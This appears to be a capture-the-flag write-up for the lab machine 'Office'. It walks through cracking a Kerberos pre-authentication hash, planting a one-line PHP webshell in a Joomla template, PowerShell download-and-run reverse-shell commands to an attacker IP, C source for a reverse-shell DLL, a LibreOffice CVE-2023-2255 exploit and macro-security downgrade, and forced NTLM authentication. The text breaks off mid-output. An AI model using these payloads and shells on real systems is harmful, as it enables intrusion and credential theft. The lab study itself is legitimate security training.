opcode@debian$ smbclientng --target 10.10.11.3 -d DC.office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!'
               _          _ _            _                    
 ___ _ __ ___ | |__   ___| (_) ___ _ __ | |_      _ __   __ _ 
/ __| '_ ` _ \| '_ \ / __| | |/ _ \ '_ \| __|____| '_ \ / _` |
\__ \ | | | | | |_) | (__| | |  __/ | | | ||_____| | | | (_| |
|___/_| |_| |_|_.__/ \___|_|_|\___|_| |_|\__|    |_| |_|\__, |
    by @podalirius_                               v1.4  |___/  
    
[+] Successfully authenticated to '10.10.11.3' as 'DC.office.htb\dwolfe'!
⏺[\\10.10.11.3\]> use SOC Analysis
⏺[\\10.10.11.3\SOC Analysis\]> ls
d-------     0.00 B  2023-05-11 00:22  .\
d--h--s-     0.00 B  2024-06-25 19:05  ..\
-a------    1.31 MB  2023-05-08 06:29  Latest-System-Dump-8fbc124d.pcap
⏺[\\10.10.11.3\SOC Analysis\]> get Latest-System-Dump-8fbc124d.pcap
'Latest-System-Dump-8fbc124d.pcap' ━━━━━━━ 100.0% • 1.4/1.4 • 18.6     • 0:00:00
                                                    MB        kB/s              
```

## Password from Kerberos pre-authentication packets

After opening `Latest-System-Dump-8fbc124d.pcap` in WireShark, we can have a look at the `Protocol Hierarchy`:

![2](images/2.png)

I looked through the DNS and QUIC packets, but they are not helpful. TCP packets were encrypted.  
The SMB and Kerberos packets at the end are interesting, particularly the `AS-REQ` packets:

![3](images/3.png)

It is the packet capture of a user accessing their SMB share.  
During the initial authentication, the user requests a TGT from the KDC in the form of an AS-REQ packet.  
In this packet, the user encrypts the current timestamp using his password and sends it to the server.  
Therefore, we can try brute-forcing that encrypted data using a wordlist, and if the password is weak, we'll get valid data decrypted back.

This technique was showcased by [VBScrub](https://x.com/vbscrub) in his blog post [Getting Passwords From Kerberos Pre-Authentication Packets](https://vbscrub.com/2020/02/27/getting-passwords-from-kerberos-pre-authentication-packets/)

In our case, the encryption mode (`etype`) is `eTYPE-AES256-CTS-HMAC-SHA1-96` (18), same as `VBScrub`'s example.  
The encrypted timestamp is present in `padata`, under `pA-ENC-TIMESTAMP`:

```text
a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
```

The `cname` and `realm` are in `req-body`: `tstark` and `OFFICE.HTB`, respectively.

However, `VBScrub` uses `hashcat`, while I use `john`. To format my hash properly, I referred to [krb2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/krb2john.py)

```py
sys.stdout.write("%s:$krb5pa$%s$%s$%s$%s$%s\n" % (user, etype, user, realm, salt, PA_DATA_ENC_TIMESTAMP))
```

The salt needs to be extracted from `kerberos.etype_info2.salt` from a different packet when `etype` is 17 or 18, but I could not find it.  
In `krb2john`, it has been commented that the `realm.user` has to be used as salt if the `kerberos.etype_info2.salt` cannot be obtained.  
The hash following the described format:

```text
tstark:$krb5pa$18$tstark$OFFICE.HTB$tstark$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
```

It did not work. I found another project: [ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher)  
For `etype` 18, their format is:

```py
if HashFormat == 'hashcat':
    if etype == 17 or etype == 18 :
        HashToCrack = f'$krb5asrep${etype}${username}${domain}${cipher[-24:]}${cipher[:-24]}'
    else :
        HashToCrack = f'$krb5asrep${etype}${username}@{domain}:{cipher[:32]}${cipher[32:]}'
else :
    if etype == 17 or etype == 18 :
        HashToCrack = f'$krb5asrep${etype}${domain}{username}${cipher[:-24]}${cipher[-24:]}'
    else :
        HashToCrack = f'$krb5asrep${username}@{domain}:{cipher[:32]}${cipher[32:]}'
```

Even though this project is for AS-REP, I found it informative. For `john-the-ripper` format, they concatenate the domain and username and use it as salt.  
It clicked that the period in `realm.user` mentioned in the `krb2john.py` comment referred to concatenation 😅.  
When I tried the same, I was able to crack the hash:

```text
tstark:$krb5pa$18$tstark$OFFICE.HTB$OFFICE.HTBtstark$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
```

```console
opcode@debian$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

It quickly cracked and I received the credentials:

```text
tstark:playboy69
```

## RCE by modifying Joomla template

Even though we have the user `tstark`, it only belongs to the `Registry Editors` group. We cannot get a WinRM shell.

```console
root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'tstark' -p 'playboy69' -M whoami
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\tstark:playboy69
WHOAMI      10.10.11.3      389    DC               distinguishedName: CN=tstark,CN=Users,DC=office,DC=htb
WHOAMI      10.10.11.3      389    DC               Member of: CN=Registry Editors,CN=Users,DC=office,DC=htb
WHOAMI      10.10.11.3      389    DC               name: tstark
WHOAMI      10.10.11.3      389    DC               Enabled: Yes
WHOAMI      10.10.11.3      389    DC               Password Never Expires: Yes
WHOAMI      10.10.11.3      389    DC               Last logon: 133645224101871280
WHOAMI      10.10.11.3      389    DC               pwdLastSet: 133280695206850975
WHOAMI      10.10.11.3      389    DC               logonCount: 85
WHOAMI      10.10.11.3      389    DC               sAMAccountName: tstark
```

We cannot access any new shares either:

```console
root@6bf4af05914d:~# nxc smb 10.10.11.3 -d office.htb -u 'tstark' -p 'playboy69'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\tstark:playboy69 
SMB         10.10.11.3      445    DC               [*] Enumerated shares
SMB         10.10.11.3      445    DC               Share           Permissions     Remark
SMB         10.10.11.3      445    DC               -----           -----------     ------
SMB         10.10.11.3      445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.3      445    DC               C$                              Default share
SMB         10.10.11.3      445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.3      445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.3      445    DC               SOC Analysis                    
SMB         10.10.11.3      445    DC               SYSVOL          READ            Logon server share 
```

The password `playboy69` also work for [Joomla Administrator Login](http://office.htb/administrator/) with the username `Administrator`  
Once inside the Joomla Admin Dashboard, we get RCE by modifying a writeable template, same as the box Devvortex:

- On left sidebar, `System` --> `Site Templates` --> `Cassiopeia Details and Files`
- Choose `error.php`
- Replace everything with `<?php system($_SERVER['HTTP_USER_AGENT'])?>`

```console
opcode@debian$ curl 'http://office.htb/templates/cassiopeia/error.php' -A 'whoami'
office\web_account
```

To get RCE:

```console
opcode@debian$ curl 'http://office.htb/templates/cassiopeia/error.php' -A 'powershell.exe IEX(IWR http://10.10.14.26:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.26 9001'
```

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
office\web_account S-1-5-21-1199398058-4196589450-691661856-1118


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       3820
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       3820
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       5816
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       412
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       3820
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2928
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       540
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1156
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1512
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       2096
  TCP    0.0.0.0:62575          0.0.0.0:0              LISTENING       6496
  TCP    0.0.0.0:62578          0.0.0.0:0              LISTENING       6492
  TCP    0.0.0.0:64552          0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:64557          0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:64564          0.0.0.0:0              LISTENING       660
  TCP    10.10.11.3:53          0.0.0.0:0              LISTENING       6496
  TCP    10.10.11.3:139         0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       6496
```

The ports 3306 (MySQL), 3389 (RDP) and 8083 were not exposed.  
We can use [chisel](https://github.com/jpillora/chisel) to expose them.  
On my VM:

```console
opcode@debian$ ./chisel server -p 9999 --reverse -v
```

On the box:

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/chisel.exe -o chisel.exe
PS C:\Windows\Tasks> .\chisel.exe client 10.10.14.26:9999 R:3306:127.0.0.1:3306 R:3389:127.0.0.1:3389 R:8083:127.0.0.1:8083
```

We can use `nmap` to scan them:

```console
opcode@debian$ nmap -sC -sV -p 3306,3389,8083 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0033s latency).

PORT     STATE SERVICE       VERSION
3306/tcp open  mysql         MySQL 5.5.5-10.4.28-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.28-MariaDB
|   Thread ID: 1663
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolOld, Speaks41ProtocolNew, IgnoreSigpipes, Support41Auth, SupportsTransactions, InteractiveClient, SupportsCompression, IgnoreSpaceBeforeParenthesis, FoundRows, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: \zsQy.x49`Z~1tuqV:\D
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: OFFICE
|   NetBIOS_Domain_Name: OFFICE
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: office.htb
|   DNS_Computer_Name: DC.office.htb
|   DNS_Tree_Name: office.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2024-07-04T01:04:22+00:00
| ssl-cert: Subject: commonName=DC.office.htb
| Not valid before: 2024-07-02T12:01:02
|_Not valid after:  2025-01-01T12:01:02
|_ssl-date: 2024-07-04T01:04:28+00:00; +8h00m02s from scanner time.
8083/tcp open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: Holography Industries
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
```

We should check MySQL databases:

```console
opcode@debian$ mysql -h 127.0.0.1 -u root --password='H0lOgrams4reTakIng0Ver754!'
```

```console
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla_db          |
| mysql              |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+

mysql> use joomla_db;

mysql> show tables;
+-------------------------------+
| Tables_in_joomla_db           |
+-------------------------------+
| if2tx_action_log_config       |
| if2tx_action_logs             |
| if2tx_action_logs_extensions  |
| if2tx_action_logs_users       |
| if2tx_assets                  |
| if2tx_associations            |
| if2tx_banner_clients          |
| if2tx_banner_tracks           |
| if2tx_banners                 |
| if2tx_bfstop_allowlist        |
| if2tx_bfstop_bannedip         |
| if2tx_bfstop_failedlogin      |
| if2tx_bfstop_unblock          |
| if2tx_bfstop_unblock_token    |
| if2tx_categories              |
| if2tx_contact_details         |
| if2tx_content                 |
| if2tx_content_frontpage       |
| if2tx_content_rating          |
| if2tx_content_types           |
| if2tx_contentitem_tag_map     |
| if2tx_extensions              |
| if2tx_fields                  |
| if2tx_fields_categories       |
| if2tx_fields_groups           |
| if2tx_fields_values           |
| if2tx_finder_filters          |
| if2tx_finder_links            |
| if2tx_finder_links_terms      |
| if2tx_finder_logging          |
| if2tx_finder_taxonomy         |
| if2tx_finder_taxonomy_map     |
| if2tx_finder_terms            |
| if2tx_finder_terms_common     |
| if2tx_finder_tokens           |
| if2tx_finder_tokens_aggregate |
| if2tx_finder_types            |
| if2tx_history                 |
| if2tx_languages               |
| if2tx_mail_templates          |
| if2tx_menu                    |
| if2tx_menu_types              |
| if2tx_messages                |
| if2tx_messages_cfg            |
| if2tx_modules                 |
| if2tx_modules_menu            |
| if2tx_newsfeeds               |
| if2tx_overrider               |
| if2tx_postinstall_messages    |
| if2tx_privacy_consents        |
| if2tx_privacy_requests        |
| if2tx_redirect_links          |
| if2tx_scheduler_tasks         |
| if2tx_schemas                 |
| if2tx_session                 |
| if2tx_tags                    |
| if2tx_template_overrides      |
| if2tx_template_styles         |
| if2tx_ucm_base                |
| if2tx_ucm_content             |
| if2tx_update_sites            |
| if2tx_update_sites_extensions |
| if2tx_updates                 |
| if2tx_user_keys               |
| if2tx_user_mfa                |
| if2tx_user_notes              |
| if2tx_user_profiles           |
| if2tx_user_usergroup_map      |
| if2tx_usergroups              |
| if2tx_users                   |
| if2tx_viewlevels              |
| if2tx_webauthn_credentials    |
| if2tx_workflow_associations   |
| if2tx_workflow_stages         |
| if2tx_workflow_transitions    |
| if2tx_workflows               |
+-------------------------------+
```

```console
mysql> select * from if2tx_user_notes;
Empty set (0.22 sec)

mysql> select * from if2tx_users\G
*************************** 1. row ***************************
           id: 474
         name: Tony Stark
     username: Administrator
        email: Administrator@holography.htb
     password: $2y$10$Sri2opRSG/kIMYoQ0gjcHuT1RzYuc6rr5IXKugqSqdkHK1XUilUZ.
        block: 0
    sendEmail: 1
 registerDate: 2023-04-13 23:27:32
lastvisitDate: 2024-07-04 00:52:37
   activation: 0
       params: {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"}
lastResetTime: NULL
   resetCount: 0
       otpKey: 
         otep: 
 requireReset: 0
 authProvider: 
```

This hash is not meant to be cracked.  
We can also try running [adPEAS](https://github.com/61106960/adPEAS):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.26:8000/adPEAS.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-adPEAS
```

Nothing interesting was found.  
We can try running [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.26:8000/PrivescCheck.ps1 -UseBasicParsing) 
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Non-default services                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Name        : Apache2.4
DisplayName : Apache2.4
ImagePath   : "C:\xampp\apache\bin\httpd.exe" -k runservice
User        : OFFICE\web_account
StartMode   : Automatic

Name        : ClickToRunSvc
DisplayName : Microsoft Office Click-to-Run Service
ImagePath   : "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
User        : LocalSystem
StartMode   : Disabled

Name        : MicrosoftSearchInBing
DisplayName : Microsoft Search in Bing
ImagePath   : "C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : mysql
DisplayName : mysql
ImagePath   : C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql
User        : OFFICE\web_account
StartMode   : Automatic

[--SNIP--]
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Non-default applications                          ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

Name                     FullName
----                     --------
LibreOffice 4            C:\Program Files (x86)\LibreOffice 4
Microsoft                C:\Program Files (x86)\Microsoft
Application              C:\Program Files (x86)\Microsoft\Edge\Application
Application              C:\Program Files (x86)\Microsoft\EdgeWebView\Application
Microsoft Search in Bing C:\Program Files (x86)\Microsoft\Microsoft Search in Bing
Teams Installer          C:\Program Files (x86)\Teams Installer
LibreOffice 5            C:\Program Files\LibreOffice 5
Microsoft OneDrive       C:\Program Files\Microsoft OneDrive
Npcap                    C:\Program Files\Npcap
Oracle                   C:\Program Files\Oracle
VMware                   C:\Program Files\VMware
VMware Tools             C:\Program Files\VMware\VMware Tools
Wireshark                C:\Program Files\Wireshark
xampp                    C:\xampp
```

You don't see Wireshark and LibreOffice installed on HTB machines every day.

```console
PS C:\> Get-Acl -Path C:\xampp\htdocs\internal | Format-List


Path   : Microsoft.PowerShell.Core\FileSystem::C:\xampp\htdocs\internal
Owner  : BUILTIN\Administrators
Group  : OFFICE\Domain Users
Access : NT AUTHORITY\LOCAL SERVICE Allow  FullControl
         OFFICE\web_account Allow  ReadAndExecute, Synchronize
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         CREATOR OWNER Allow  FullControl
Audit  : 
Sddl   : O:BAG:DUD:AI(A;OICIID;FA;;;LS)(A;OICIID;0x1200a9;;;S-1-5-21-1199398058-4196589450-691661856-1118)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)(A;OICIIOID;FA;;;CO)



PS C:\> Get-Acl -Path C:\xampp\htdocs\joomla | Format-List


Path   : Microsoft.PowerShell.Core\FileSystem::C:\xampp\htdocs\joomla
Owner  : BUILTIN\Administrators
Group  : OFFICE\Domain Users
Access : CREATOR OWNER Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\LOCAL SERVICE Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         OFFICE\web_account Allow  Write, ReadAndExecute, Synchronize
Audit  :
Sddl   : O:BAG:DUD:PAI(A;OICIIO;FA;;;CO)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)(A;OICI;FA;;;BA)(A;OICI;0x1200a9;;;BU)(A;OICI;0x1201bf;;;S-1-5-21-1199398058-4196589450-691661856-1118)
```

Let us have a look at this "internal" web application hosted on port 8083. We've already tunneled it with `chisel`.  
It allows us to submit job applications:

![4](images/4.png)

There's an upload option that only allows files with extensions `.doc`, `.docx`, `.docm`, or `.odt`  
Thanks to the box name Office, we can expect a phishing step.

## Unintended - RCE with LibreOffice CVE-2023-2255

A vulnerability in LibreOffice was discovered recently: CVE-2023-2255.  
Its exploit can be found at <https://github.com/elweth-sec/CVE-2023-2255>

For exploitation, create a `dll` for reverse shell:

```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>


int pwn()
{
    WinExec("powershell.exe IEX(IWR http://10.10.14.26:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.26 9001", 0);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        pwn();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

Compile with:

```console
opcode@debian$ x86_64-w64-mingw32-gcc -shared -o opcode.dll dllmain.c
```

Upload and test the `dll`:

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/opcode.dll -o opcode.dll
PS C:\Windows\Tasks> rundll32 C:\Windows\Tasks\opcode.dll,pwn
```

We also need to add the ACL `FullControl` for `Everyone` over this file:

```console
PS C:\> $acl = Get-Acl C:\Windows\Tasks\opcode.dll
PS C:\> $fileSystemAccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone", "FullControl", "Allow")
PS C:\> $acl.SetAccessRule($fileSystemAccessRule)
PS C:\> Set-Acl C:\Windows\Tasks\opcode.dll $acl
```

Generate the malicious odt:

```console
opcode@debian$ git clone https://github.com/elweth-sec/CVE-2023-2255.git
opcode@debian$ cd CVE-2023-2255
opcode@debian$ python3 CVE-2023-2255.py --cmd 'rundll32 C:\Windows\Tasks\opcode.dll,pwn' --output 'exploit.odt'
File exploit.odt has been created !
```

After uploading it via that form, I received a shell as `ppotts` after a while:

```console
PS C:\Program Files\LibreOffice 5\program> whoami
office\ppotts
```

## Intended - RCE with LibreOffice Macro

The intended approach to this box did not rely on a CVE. Instead, a malicious macro was to be abused.  
If we send an `.odt` file with a malicious macro, it will not get executed because the macro security level is set to high on this machine:

```console
PS C:\> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel"

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel
    Value    REG_DWORD    0x3
    Final    REG_DWORD    0x1
```

Thankfully, we have the credentials for user `tstark`, who belongs to the `Registry Editors` group.  
Firstly, we can use [RunasCs](https://github.com/antonioCoco/RunasCs) to obtain as `tstark`

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/RunasCs.exe -o RunasCs.exe
PS C:\Windows\Tasks> .\RunasCs.exe tstark playboy69 'powershell.exe IEX(IWR http://10.10.14.26:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.26 9001'
```

We can disable macro security as `tstark`:

```console
PS C:\> reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 0 /f
The operation completed successfully.
```

Sending a document with macro should result in code execution after those registry changes.  
I opened LibreOffice Writer, saved a document as `hello.odt`, and navigated to `Tools` > `Macros` > `Organize Macros` > `Basic`  
Under `hello.odt` > `Standard`, I created a new macro module with the name `Module1` with the contents:

```shell
Sub Main
    shell("rundll32 C:\Windows\Tasks\opcode.dll,pwn")
End Sub
```

Under `Tools` > `Customize`, under the `Events` tab, on the `Open Document` event, I assigned this newly created macro to the document.  
Afterwards, I uploaded `hello.odt`. After waiting for a while, I received a shell:

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name     SID
============= =============================================
office\ppotts S-1-5-21-1199398058-4196589450-691661856-1107


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
OFFICE\Registry Editors                    Group            S-1-5-21-1199398058-4196589450-691661856-1106 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

## Decrypting DPAPI masterkeys without credentials

I ran [PrivescCheck](https://github.com/itm4n/PrivescCheck) as `ppotts`, and something caught my eyes:

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0006 - Credential Access                        ┃
┃ NAME     ┃ Credential files                                  ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the current user's CREDENTIAL files.   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Type     : Credentials
FullPath : C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E

Type     : Credentials
FullPath : C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

Type     : Credentials
FullPath : C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\E76CCA3670CD9BB98DF79E0A8D176F1E

Type     : Protect
FullPath : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d

Type     : Protect
FullPath : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb

Type     : Protect
FullPath : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\2e60efce-b7d4-43aa-9160-5202ca6b8be2
```

Here, we have the encrypted saved credentials and the corresponding masterkeys.  
However, we need `ppotts` password to decrypt the masterkeys.  
I tried using a UNC path to force an NTLM authentication:

```console
PS C:\> net use \\10.10.14.26\crate
```

```text
[SMB] NTLMv2-SSP Client   : 10.10.11.3
[SMB] NTLMv2-SSP Username : OFFICE\PPotts
